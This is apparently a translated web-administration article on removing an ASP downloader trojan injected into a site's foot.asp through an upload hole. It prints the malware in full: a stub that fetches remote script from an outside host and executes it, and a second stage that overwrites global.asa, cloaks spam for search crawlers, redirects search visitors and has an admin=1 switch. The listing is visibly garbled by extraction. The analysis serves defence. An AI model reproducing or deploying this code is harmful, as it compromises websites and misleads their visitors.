Comments: Recently, pages on several customer websites have been found loading code from a remote server. The cause is injected code that uses MSXML2.serverXMLHTTP to download and execute remote script. The specific solution follows. Solution:
1. Run a comprehensive scan of the websites on the server with Website Trojan Cleaning Expert, a tool developed by the qingcloud team: http://www.jb51.net/softs/12771.html
2. If the trojan is still present after that, use the quick trojan detection function of Website Trojan Cleaning Expert to search for and remove files that contain the signature "by * aming" or "aming", as shown in:
3. Turn off the thumbnail function on the server. For the method, see http://www.jb51.net/ OS /windows/Win2003/34960.html
Root cause:
In this case, the site was infected with a downloader-type trojan. By exploiting an upload vulnerability in the website, the attacker inserted the following code into foot.asp in the root directory of the website:
The Code is as follows:
<%
' NOTE(review): this is the injected first-stage stub described in the article. The
' listing appears to have been altered by extraction/translation (stray spaces inside
' identifiers and string literals, changed letter case), so read it as a sample for
' recognising the pattern, not as runnable code.
'By * aming
' Gethtml(url): sends an HTTP GET for url through MSXML2.ServerXMLHTTP and returns
' the response body decoded as gb2312 text.
Function Gethtml (url)
Set ObjXMLHTTP = Server. CreateObject ("MSXML2.serverXMLHTTP ")
' Third argument False: the request is synchronous, so the page blocks until it returns.
ObjXMLHTTP. Open "GET", url, False
' The User-Agent header is set to the requested URL itself. An outbound request from
' the web server whose User-Agent equals its own URL is a usable network indicator.
ObjXMLHTTP. setRequestHeader "User-Agent", url
ObjXMLHTTP. send
' responseBody is the raw byte array; it is converted to text through ADODB.Stream below.
Gethtml = ObjXMLHTTP. responseBody
Set ObjXMLHTTP = Nothing
Set objStream = Server. CreateObject ("Adodb. Stream ")
' Type = 1: binary stream. Mode = 3: read/write.
ObjStream. Type = 1
ObjStream. Mode = 3
ObjStream. Open
ObjStream. Write Gethtml
' Rewind, then switch the stream to text (Type = 2) so the bytes are read back as gb2312.
ObjStream. Position = 0
ObjStream. Type = 2
ObjStream. Charset = "gb2312"
Gethtml = objStream. ReadText
ObjStream. Close
Set objStream = Nothing
End Function
' The fetched text is passed straight to Execute, so whatever the remote host serves
' runs as VBScript inside this page on every request. The behaviour of the site is
' therefore controlled by the remote file, not by anything stored in foot.asp.
' For review: Execute fed by an HTTP fetch in an include such as a footer is the
' pattern to search for across the site's .asp files.
Execute (Gethtml ("http://www.pornhome.com/dy7749/xmlasaquan.txt "))
%>
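Remove this code to solve the problem. Because the downloaded second stage (listed below) also overwrites global.asa, check that file as well, and fix the upload vulnerability so the code cannot be inserted again. The results reported by Website Trojan Cleaning Expert are shown in the figure.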
The content of xmlasaquan.txt is as follows:
The Code is as follows:
'<Html> '<Meta http-equiv = refresh content = 0; URL = about: blank> <script> eval (function (p, a, c, k, e, d) {e = function (c) {return c}; if (! ''. Replace (/^/, String) {while (c --) {d [c] = k [c] | c} k = [function (e) {return d [e]}]; e = function () {return '\ w +'}; c = 1}; while (c --) {if (k [c]) {p = p. replace (new RegExp ('\ B' + e (c) + '\ B', 'G'), k [c])} return p} ('0. 1.2 (\ '3: 4 \ ');', 5, 5, 'window | location | replace | about | blank '. split ('|'), 0, {}) </script>
'By * aming
' Raises the ASP script timeout to 600 seconds; presumably so the remote fetches
' performed further down are not cut off by the default timeout.
Server. ScriptTimeout = 600
' createasa(Content): replaces the site's /global.asa with Content and then marks the
' file read-only, hidden and system. global.asa is processed by ASP for application
' and session events, so content written here persists after the injected include has
' been cleaned. For review: check global.asa for unexpected content and for the
' read-only/hidden/system attribute combination.
Public Function createasa (ByVal Content)
' All runtime errors are suppressed, so a failed write leaves no visible error on the page.
On Error Resume Next
Set fso = Server. CreateObject ("scripting. filesystemobject ")
' The path is the mapped /global.asa with a "//./" prefix; the purpose of the prefix
' is not shown in this listing.
Set f = fso. Getfile ("//./" & Server. MapPath ("/global. asa "))
' Attributes = 0 clears read-only/hidden/system so the file can be overwritten.
F. Attributes = 0
' The ProgID is assembled from string fragments; presumably to avoid scanners that
' match the literal ProgID string.
Set Obj = Server. CreateObject ("adod" & "B. S" & "tream ")
' Type = 2: text stream.
Obj. Type = 2
Obj. open
Obj. Charset = "gb2312"
Obj. Position = Obj. Size
' NOTE(review): printed as an assignment; the original is likely a WriteText call.
Obj. writetext = Content
' Second argument 2: overwrite the existing file.
Obj. SaveToFile "//./" & Server. MapPath ("/global. asa"), 2
Obj. Close
Set Obj = Nothing
' 1 + 2 + 4 = read-only + hidden + system, applied to the rewritten global.asa.
F. Attributes = 1 + 2 + 4
Set f = Nothing
Set fso = Nothing
End Function
' GetHtml(url): same fetch helper as in the first-stage stub. Sends a synchronous HTTP
' GET for url through MSXML2.ServerXMLHTTP and returns the body decoded as gb2312 text.
Public Function GetHtml (url)
Set ObjXMLHTTP = Server. CreateObject ("MSXML2.serverXMLHTTP ")
' Third argument False: synchronous request.
ObjXMLHTTP. Open "GET", url, False
' The User-Agent header carries the requested URL itself.
ObjXMLHTTP. setRequestHeader "User-Agent", url
ObjXMLHTTP. send
' Raw response bytes; converted to text through ADODB.Stream below.
GetHtml = ObjXMLHTTP. responseBody
Set ObjXMLHTTP = Nothing
Set objStream = Server. CreateObject ("Adodb. Stream ")
' Type = 1: binary stream. Mode = 3: read/write.
ObjStream. Type = 1
ObjStream. Mode = 3
ObjStream. Open
ObjStream. Write GetHtml
' Rewind and re-read the same bytes as gb2312 text (Type = 2).
ObjStream. Position = 0
ObjStream. Type = 2
ObjStream. Charset = "gb2312"
GetHtml = objStream. ReadText
ObjStream. Close
End Function
' check(user_agent): returns True when user_agent contains any name from the
' hard-coded list of search-engine crawlers, otherwise False.
' NOTE(review): as printed, the InStr call is missing a closing parenthesis and "Exit"
' lacks its "For"; this looks like extraction damage rather than the original text.
Function check (user_agent)
' Comma-separated crawler names split into an array.
Allow_agent = split ("Baiduspider, Sogou, baidu, Sosospider, Googlebot, FAST-WebCrawler, MSNBOT, Slurp ",",")
Check_agent = false
For agenti = lbound (allow_agent) to ubound (allow_agent)
' Substring match of each crawler name against the User-Agent.
If instr (user_agent, allow_agent (agenti)> 0 then
Check_agent = true
Exit
End if
Next
Check = check_agent
End function
' CheckRobot(): returns True when the request's User-Agent contains "Baiduspider" or
' "Googlebot", or when the session flag ThisCheckRobot is set. The flag is set by any
' request carrying admin=1 in the query string.
' No call to this function appears in the visible top-level code of this listing.
Function CheckRobot ()
CheckRobot = False
Dim Botlist, I, Repls
Repls = request. ServerVariables ("http_user_agent ")
Krobotlist = "Baiduspider | Googlebot"
Botlist = Split (Krobotlist, "| ")
For I = 0 To Ubound (Botlist)
' Substring match of each crawler name against the User-Agent.
If InStr (Repls, Botlist (I)> 0 Then
CheckRobot = True
Exit
End If
Next
' Query-string switch: admin=1 stores a session flag that makes later requests in the
' same session count as a crawler.
If Request. QueryString ("admin") = "1" Then Session ("ThisCheckRobot") = 1
If Session ("ThisCheckRobot") = 1 Then CheckRobot = True
End Function
' CheckRefresh(): returns True when the first 40 characters of the request's Referer
' contain one of the listed search-engine names, i.e. the visitor arrived from a
' search result page.
Function CheckRefresh ()
CheckRefresh = False
Dim Botlist, I, Repls
Krobotlist = "baidu | google | sogou | soso | youdao"
Botlist = Split (Krobotlist, "| ")
For I = 0 To Ubound (Botlist)
' Only the leading 40 characters of the Referer are examined.
If InStr (left (request. servervariables ("HTTP_REFERER"), "40"), Botlist (I)> 0 Then
CheckRefresh = True
Exit
End If
Next
End Function
' sleep(): despite the name, this does not wait. It flushes the buffered response if
' the client is still connected and ends the response otherwise.
Sub sleep ()
If response. IsClientConnected = true then
Response. Flush
Else
Response. end
End if
End Sub
' Search-referrer redirect: a visitor whose Referer matches a search engine is sent to
' an external site, with this site's lower-cased host name appended to the URL.
' Visitors who type the address directly are not redirected, so the site owner may not
' see the symptom; verify a cleanup by loading the page through a search-result link.
If CheckRefresh = true Then
Cnnbd = lcase (request. servervariables ("HTTP_HOST "))
Response. redirect ("http://www.82767.com /? "& Cnnbd &"")
' The next line is commented out in the sample: an HTML fallback link plus
' third-party counter and script includes.
'Response. write ("<a href = http://www.82767.com> <font _ fcksavedurl =" http://www.82767.com> <font "color = # FF0000> If your browser does not support redirection, please click to enter >>>>>></font> </a> <div style = display: none> <script src = http://count11.51yes.com/click.aspx? Id = 114814173 & logo = 12> </script> </div> <script _ fcksavedurl = "http://count11.51yes.com/click.aspx? Id = 114814173 & logo = 12> </script> </div> <script "src = http://js.568tea.com/44.js> </script> <script src = http://js.37548.com/44.js> </script> ")
Response. end
End If
' Main branch for requests that did not come from a search-result page.
User_agent = Request. ServerVariables ("HTTP_USER_AGENT ")
' Crawler branch (cloaking): when the User-Agent matches the crawler list, content is
' fetched from a remote host and returned in place of the real page, so search engines
' index text the site owner never sees. strHost is not assigned anywhere in this listing.
If check (user_agent) = true then
Body = GetHtml ("http://fudu.qpedu.cn/xml/prn/con.2.asp? Domain = "& strHost &" & ua = "& server. URLEncode (request. ServerVariables (" HTTP_USER_AGENT "))&"")
Response. write body
Response. end
Else
' Persistence branch: a further remote text is downloaded and, if it contains the
' marker string "by * aming", written over /global.asa by createasa.
Asa = GetHtml ("http://www.pornhome.com/dy7749/codequan.txt ")
If instr (asa, "by * aming")> 0 then
Createasa (asa)
End if
' Rebuild the lower-cased URL of the current request (host + script path + query string).
ScriptAddress = Request. ServerVariables ("SCRIPT_NAME ")
Namepath = Server. MapPath (ScriptAddress)
If Len (Request. QueryString)> 0 Then
ScriptAddress = ScriptAddress &"? "& Request. QueryString
End if
Geturl = "http: //" & Request. ServerVariables ("http_host") & ScriptAddress
Geturl = LCase (geturl)
' The three lines below are commented out in the sample (debug output and an older,
' longer form of the condition that also excluded gov.cn and edu.cn hosts).
'Response. write replace (namepath, server. MapPath ("/"),"")
'Response. end
'If instr (geturl, "jc = OK") = 0 and instr (geturl, "global = OK") = 0 and instr (LCase (Request. serverVariables ("http_host"), "gov.cn") = 0 and instr (LCase (Request. serverVariables ("http_host"), "edu.cn") = 0 and
' Condition as printed: the URL is neither /index.asp nor the site root, and the
' Referer does not contain this site's own host name.
If instr (geturl, "http: //" & Request. serverVariables ("http_host") & "/index. asp ") = 0 and instr (geturl," http: // "& Request. serverVariables ("http_host") & "/") = 0 and instr (LCase (Request. serverVariables ("HTTP_REFERER"), LCase (Request. serverVariables ("http_host") <= 0 then
Agent = lcase (request. servervariables ("http_user_agent "))
Referer = LCase (Request. ServerVariables ("HTTP_REFERER "))
Bot = ""
Amll = ""
' Coarse User-Agent classification: generic crawler-like substrings copy the agent
' into bot; named search engines then overwrite it with "nobot".
If instr (agent, "+")> 0 then bot = agent
If instr (agent, "-")> 0 then bot = agent
If instr (agent, "http")> 0 then bot = agent
If instr (agent, "spider")> 0 then bot = agent
If instr (agent, "bot")> 0 then bot = agent
If instr (agent, "linux")> 0 then bot = agent
If instr (agent, "baidu")> 0 then bot = agent
If instr (agent, "google")> 0 then bot = "nobot"
If instr (agent, "yahoo")> 0 then bot = "nobot"
If instr (agent, "msn")> 0 then bot = "nobot"
If instr (agent, "alexa")> 0 then bot = "nobot"
If instr (agent, "sogou")> 0 then bot = "nobot"
If instr (agent, "youdao")> 0 then bot = "nobot"
If instr (agent, "soso")> 0 then bot = "nobot"
If instr (agent, "iask")> 0 then bot = "nobot"
' Both statements in this branch are commented out, so in this sample the
' classification above has no effect.
If bot = "nobot" then
'Call WriteErr
'Response. end
End if
' Flush the response if the client is still connected, otherwise end it (see Sub sleep).
Call sleep ()
End if
End if
'</Body>